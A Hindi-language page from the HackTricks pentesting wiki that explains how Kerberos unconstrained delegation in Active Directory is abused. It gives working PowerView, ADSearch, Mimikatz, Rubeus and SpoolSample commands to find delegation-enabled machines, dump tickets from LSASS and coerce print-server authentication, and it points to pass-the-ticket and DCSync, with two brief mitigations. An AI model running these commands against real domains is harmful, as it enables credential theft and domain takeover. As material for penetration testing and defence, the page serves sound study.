Unconstrained Delegation

Support HackTricks

Unconstrained delegation

यह एक विशेषता है जिसे एक डोमेन प्रशासक डोमेन के अंदर किसी भी कंप्यूटर पर सेट कर सकता है। फिर, जब भी कोई उपयोगकर्ता उस कंप्यूटर पर लॉगिन करता है, उस उपयोगकर्ता का TGT की एक प्रति DC द्वारा प्रदान किए गए TGS के अंदर भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी। इसलिए, यदि आपके पास मशीन पर प्रशासक विशेषाधिकार हैं, तो आप टिकटों को डंप कर सकते हैं और किसी भी मशीन पर उपयोगकर्ताओं का अनुकरण कर सकते हैं

तो यदि एक डोमेन प्रशासक "अनकॉनस्ट्रेन्ड डेलीगेशन" विशेषता सक्रिय करके किसी कंप्यूटर पर लॉगिन करता है, और आपके पास उस मशीन के अंदर स्थानीय प्रशासक विशेषाधिकार हैं, तो आप टिकट को डंप कर सकते हैं और कहीं भी डोमेन प्रशासक का अनुकरण कर सकते हैं (डोमेन प्रिवेस्क)।

आप इस विशेषता के साथ कंप्यूटर ऑब्जेक्ट्स खोज सकते हैं यह जांचकर कि userAccountControl विशेषता में ADS_UF_TRUSTED_FOR_DELEGATION शामिल है या नहीं। आप इसे ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’ के LDAP फ़िल्टर के साथ कर सकते हैं, जो पॉवव्यू करता है:

# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs

Mimikatz या Rubeus के साथ प्रशासक (या पीड़ित उपयोगकर्ता) का टिकट मेमोरी में लोड करें पास द टिकट के लिए। अधिक जानकारी: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ अनकॉनस्ट्रेन्ड डेलीगेशन के बारे में अधिक जानकारी ired.team पर।

Force Authentication

यदि एक हमलावर "अनकॉनस्ट्रेन्ड डेलीगेशन" के लिए अनुमत कंप्यूटर को समझौता करने में सक्षम है, तो वह प्रिंट सर्वर को स्वचालित रूप से लॉगिन करने के लिए धोखा दे सकता है जिससे सर्वर की मेमोरी में एक TGT सहेजा जाएगा। फिर, हमलावर उपयोगकर्ता प्रिंट सर्वर कंप्यूटर खाते का अनुकरण करने के लिए एक पास द टिकट हमले का प्रदर्शन कर सकता है

किसी भी मशीन के खिलाफ प्रिंट सर्वर को लॉगिन कराने के लिए आप SpoolSample का उपयोग कर सकते हैं:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक DCSync attack कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं। इस हमले के बारे में अधिक जानकारी ired.team पर।

यहाँ प्रमाणीकरण को मजबूर करने के अन्य तरीके हैं:

Force NTLM Privileged Authentication

शमन

  • DA/एडमिन लॉगिन को विशिष्ट सेवाओं तक सीमित करें

  • विशेषाधिकार प्राप्त खातों के लिए "खाता संवेदनशील है और इसे प्रतिनिधित्व नहीं किया जा सकता" सेट करें।

HackTricks का समर्थन करें

Last updated